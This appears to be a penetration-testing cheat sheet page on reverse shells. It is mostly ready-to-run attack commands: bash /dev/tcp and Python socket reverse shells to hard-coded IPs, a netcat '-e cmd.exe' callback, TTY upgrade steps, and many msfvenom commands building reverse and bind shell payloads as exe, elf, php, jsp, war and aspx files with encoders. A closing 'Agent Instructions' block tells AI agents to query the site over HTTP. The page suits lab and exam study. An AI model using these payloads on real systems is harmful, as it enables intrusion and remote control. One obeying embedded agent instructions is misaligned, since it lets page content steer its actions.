# Shells

## Reverse shells

**Links**

* <https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/>

  <https://github.com/Tib3rius/rsg/blob/master/shells.txt>

  <http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>

  <https://github.com/swisskyrepo/PayloadsAllTheThings>

  <https://cyb3rdan.com/2019/07/01/oscp/>

  <https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/>

## Shells

`/bin/bash -i >& /dev/tcp/10.10.14.20/4444 0>&1` `bash -i >& /dev/tcp/192.168.32.31/4444 0>&1` `bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'`

`bash -c help`' for more information about shell builtin commands. `/bin/sh -i` `/bin/bash -i` `echo os.system('/bin/bash')`

```bash
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.11.0.126",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```

`-c` cmd : program passed in as string (terminates option list)

## Getting a shell in limited interpreters:

system("start cmd.exe /k $cmd") Second shell After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server): victim > start \10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

![](/files/-M0XzS6kNO-n4UobY93B)

## Upgrade to full Shell

```python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
$ stty raw -echo
$ fg and then enter, wait a sec, then reset enter
export TERM=linux
```

## Msfvenom

<https://www.offensive-security.com/metasploit-unleashed/Msfvenom/> <https://netsec.ws/?p=331>

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.56 LPORT=8888 -f raw > shell.jsp
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.11.0.126 LPORT=53 -f elf -o shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.126 LPORT=4444 -f exe -o shell_reverse.exe
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker_ip> -o meterpreter.php
msfvenom -p generic/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f php -o shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerIP LPORT=attackerPort -f aspx > shell.aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerIP LPORT=attackerPort -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.126 LPORT=4444 -f war > shell.war
```

`-p` = payload

`-f` = output format

`-o` = out

`-a` = architecture

`-e` = encoder

`-i` = iterations of encoder

`-b` = bad characters to avoid \x00\xff

`--platform` = platform for the payload

## Multi/Handler

```
set payload ...
set LPORT
set LHOST
exploit
```

**Create small shellcode** `msfvenom -p windows/shell_reverse_tcp -a x86 -f python –platform windows LHOST=<ip> LPORT=443 -b “\x00” EXITFUNC=thread –smallest -e x86/fnstenv_mov`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cyb-3-rw-1-z4rd.gitbook.io/cyberbook/shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.